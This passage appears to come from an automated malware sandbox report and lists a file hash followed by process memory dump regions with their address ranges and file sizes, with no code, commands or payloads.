                          baca4bab9fbafff9d97af0cd071bc51b73e05709a9daa3121d99f5e647a4e965

                          SHA512

                          fc2831dfe53fa5d3682948acba269f7d8c0d1026ca2c04b8a4e86a88965e2efd11e7a34b577e9e320ff774c7da66f20db486a2cf2d7fe799f43044bdef20d7df

                        • memory/424-130-0x0000000000400000-0x0000000000D1B000-memory.dmp

                          Filesize

                          9.1MB

                        • memory/424-126-0x0000000002D90000-0x000000000367B000-memory.dmp

                          Filesize

                          8.9MB

                        • memory/424-199-0x0000000000400000-0x0000000000D1B000-memory.dmp

                          Filesize

                          9.1MB

                        • memory/424-121-0x0000000002990000-0x0000000002D8D000-memory.dmp

                          Filesize

                          4.0MB

                        • memory/424-187-0x0000000002990000-0x0000000002D8D000-memory.dmp

                          Filesize

                          4.0MB

                        • memory/792-144-0x0000000002B90000-0x0000000002B96000-memory.dmp

                          Filesize

                          24KB

                        • memory/1156-103-0x0000000005150000-0x0000000005253000-memory.dmp

                          Filesize

                          1.0MB

                        • memory/1156-131-0x0000000005260000-0x000000000534B000-memory.dmp

                          Filesize

                          940KB

                        • memory/1156-128-0x0000000005260000-0x000000000534B000-memory.dmp

                          Filesize

                          940KB

                        • memory/1156-41-0x0000000004A90000-0x0000000004A96000-memory.dmp

                          Filesize

                          24KB

                        • memory/1156-124-0x0000000005260000-0x000000000534B000-memory.dmp

                          Filesize

                          940KB

                        • memory/1156-39-0x0000000010000000-0x000000001015E000-memory.dmp

                          Filesize

                          1.4MB

                        • memory/1284-154-0x000002A77BD00000-0x000002A77BD10000-memory.dmp

                          Filesize

                          64KB

                        • memory/1284-169-0x000002A7181C0000-0x000002A718216000-memory.dmp

                          Filesize

                          344KB

                        • memory/1284-147-0x00007FFF4F250000-0x00007FFF4FC3C000-memory.dmp

                          Filesize

                          9.9MB

                        • memory/1284-640-0x000002A77BD00000-0x000002A77BD10000-memory.dmp

                          Filesize

                          64KB

                        • memory/1284-142-0x0000000000400000-0x00000000004B2000-memory.dmp

                          Filesize

                          712KB

                        • memory/1284-168-0x000002A7181B0000-0x000002A7181B8000-memory.dmp

                          Filesize

                          32KB

                        • memory/1284-150-0x000002A77DDA0000-0x000002A77DEA2000-memory.dmp

                          Filesize

                          1.0MB

                        • memory/1284-479-0x000002A77BD00000-0x000002A77BD10000-memory.dmp

                          Filesize

                          64KB

                        • memory/1284-457-0x000002A77BD00000-0x000002A77BD10000-memory.dmp

                          Filesize

                          64KB

                        • memory/1284-360-0x00007FFF4F250000-0x00007FFF4FC3C000-memory.dmp

                          Filesize

                          9.9MB

                        • memory/1284-215-0x000002A77BD00000-0x000002A77BD10000-memory.dmp

                          Filesize

                          64KB

                        • memory/1452-37-0x000002089C420000-0x000002089C430000-memory.dmp

                          Filesize

                          64KB

                        • memory/1452-62-0x000002089D400000-0x000002089D410000-memory.dmp

                          Filesize

                          64KB

                        • memory/1452-81-0x00000208A1B40000-0x00000208A1B42000-memory.dmp

                          Filesize

                          8KB

                        • memory/2044-106-0x0000000000900000-0x0000000000A00000-memory.dmp

                          Filesize

                          1024KB

                        • memory/2044-111-0x0000000000770000-0x0000000000779000-memory.dmp

                          Filesize

                          36KB

                        • memory/2564-173-0x0000000000400000-0x0000000000409000-memory.dmp

                          Filesize

                          36KB

                        • memory/2564-118-0x0000000000400000-0x0000000000409000-memory.dmp

                          Filesize

                          36KB

                        • memory/2564-115-0x0000000000400000-0x0000000000409000-memory.dmp

                          Filesize

                          36KB

                        • memory/3016-97-0x00007FF6EC350000-0x00007FF6EC39E000-memory.dmp

                          Filesize

                          312KB

                        • memory/3016-472-0x0000000002B20000-0x0000000002C91000-memory.dmp

                          Filesize

                          1.4MB

                        • memory/3016-474-0x0000000002CA0000-0x0000000002DD1000-memory.dmp

                          Filesize

                          1.2MB

                        • memory/3348-120-0x00000000727A0000-0x0000000072E8E000-memory.dmp

                          Filesize

                          6.9MB

                        • memory/3348-136-0x0000000004E60000-0x0000000004E70000-memory.dmp

                          Filesize

                          64KB

                        • memory/3348-51-0x0000000004E60000-0x0000000004E70000-memory.dmp

                          Filesize

                          64KB

                        • memory/3348-153-0x000000000A660000-0x000000000A6F2000-memory.dmp

                          Filesize

                          584KB

                        • memory/3348-157-0x000000000B310000-0x000000000B80E000-memory.dmp

                          Filesize

                          5.0MB

                        • memory/3348-161-0x000000000A700000-0x000000000A766000-memory.dmp

                          Filesize

                          408KB

                        • memory/3348-32-0x00000000727A0000-0x0000000072E8E000-memory.dmp

                          Filesize

                          6.9MB

                        • memory/3348-33-0x0000000000DF0000-0x0000000000DF6000-memory.dmp

                          Filesize

                          24KB

                        • memory/3348-605-0x00000000727A0000-0x0000000072E8E000-memory.dmp

                          Filesize

                          6.9MB

                        • memory/3348-43-0x000000000A800000-0x000000000AE06000-memory.dmp

                          Filesize

                          6.0MB

                        • memory/3348-59-0x000000000A270000-0x000000000A2BB000-memory.dmp

                          Filesize

                          300KB

                        • memory/3348-149-0x000000000A540000-0x000000000A5B6000-memory.dmp

                          Filesize

                          472KB

                        • memory/3348-50-0x0000000004E30000-0x0000000004E42000-memory.dmp

                          Filesize

                          72KB

                        • memory/3348-48-0x000000000A300000-0x000000000A40A000-memory.dmp

                          Filesize

                          1.0MB

                        • memory/3348-184-0x000000000B2A0000-0x000000000B2F0000-memory.dmp

                          Filesize

                          320KB

                        • memory/3348-185-0x000000000BAE0000-0x000000000BCA2000-memory.dmp

                          Filesize

                          1.8MB

                        • memory/3348-186-0x000000000C1E0000-0x000000000C70C000-memory.dmp

                          Filesize

                          5.2MB

                        • memory/3348-22-0x0000000000710000-0x0000000000740000-memory.dmp

                          Filesize

                          192KB

                        • memory/3348-55-0x000000000A230000-0x000000000A26E000-memory.dmp

                          Filesize

                          248KB

                        • memory/3364-4-0x0000000001280000-0x0000000001296000-memory.dmp

                          Filesize

                          88KB

                        • memory/3364-172-0x00000000031F0000-0x0000000003206000-memory.dmp

                          Filesize

                          88KB

                        • memory/4156-3-0x0000000000400000-0x0000000000409000-memory.dmp

                          Filesize

                          36KB

                        • memory/4156-0-0x0000000000400000-0x0000000000409000-memory.dmp

                          Filesize

                          36KB

                        • memory/4156-6-0x0000000000400000-0x0000000000409000-memory.dmp

                          Filesize

                          36KB

                        • memory/4272-148-0x00007FFF4F250000-0x00007FFF4FC3C000-memory.dmp

                          Filesize

                          9.9MB

                        • memory/4272-117-0x00007FFF4F250000-0x00007FFF4FC3C000-memory.dmp

                          Filesize

                          9.9MB

                        • memory/4272-129-0x0000015FF6030000-0x0000015FF607C000-memory.dmp

                          Filesize

                          304KB

                        • memory/4272-123-0x0000015FF69A0000-0x0000015FF69B0000-memory.dmp

                          Filesize

                          64KB

                        • memory/4272-122-0x0000015FF69B0000-0x0000015FF6A80000-memory.dmp

                          Filesize

                          832KB

                        • memory/4272-119-0x0000015FF6860000-0x0000015FF6942000-memory.dmp

                          Filesize

                          904KB

                        • memory/4272-114-0x0000015FF4340000-0x0000015FF4426000-memory.dmp

                          Filesize

                          920KB

                        • memory/4408-650-0x0000000007830000-0x0000000007E58000-memory.dmp

                          Filesize

                          6.2MB

                        • memory/4408-660-0x0000000007EB0000-0x0000000007ED2000-memory.dmp

                          Filesize

                          136KB

                        • memory/4408-643-0x00000000727A0000-0x0000000072E8E000-memory.dmp

                          Filesize

                          6.9MB

                        • memory/4408-646-0x00000000071F0000-0x0000000007200000-memory.dmp

                          Filesize

                          64KB

                        • memory/4408-645-0x0000000007170000-0x00000000071A6000-memory.dmp

                          Filesize

                          216KB

                        • memory/4408-649-0x00000000071F0000-0x0000000007200000-memory.dmp

                          Filesize

                          64KB

                        • memory/4800-137-0x00000000000E0000-0x00000000002BA000-memory.dmp

                          Filesize

                          1.9MB

                        • memory/4800-163-0x00000000000E0000-0x00000000002BA000-memory.dmp

                          Filesize

                          1.9MB

                        • memory/4800-152-0x00000000000E0000-0x00000000002BA000-memory.dmp

                          Filesize

                          1.9MB

                        • memory/4864-170-0x000000000B0C0000-0x000000000B0D0000-memory.dmp

                          Filesize

                          64KB

                        • memory/4864-477-0x000000000B0C0000-0x000000000B0D0000-memory.dmp

                          Filesize

                          64KB

                        • memory/4864-469-0x00000000727A0000-0x0000000072E8E000-memory.dmp

                          Filesize

                          6.9MB

                        • memory/4864-171-0x000000000B0D0000-0x000000000B0DA000-memory.dmp

                          Filesize

                          40KB

                        • memory/4864-167-0x00000000727A0000-0x0000000072E8E000-memory.dmp

                          Filesize

                          6.9MB

                        • memory/4864-146-0x0000000000150000-0x00000000001AA000-memory.dmp

                          Filesize

                          360KB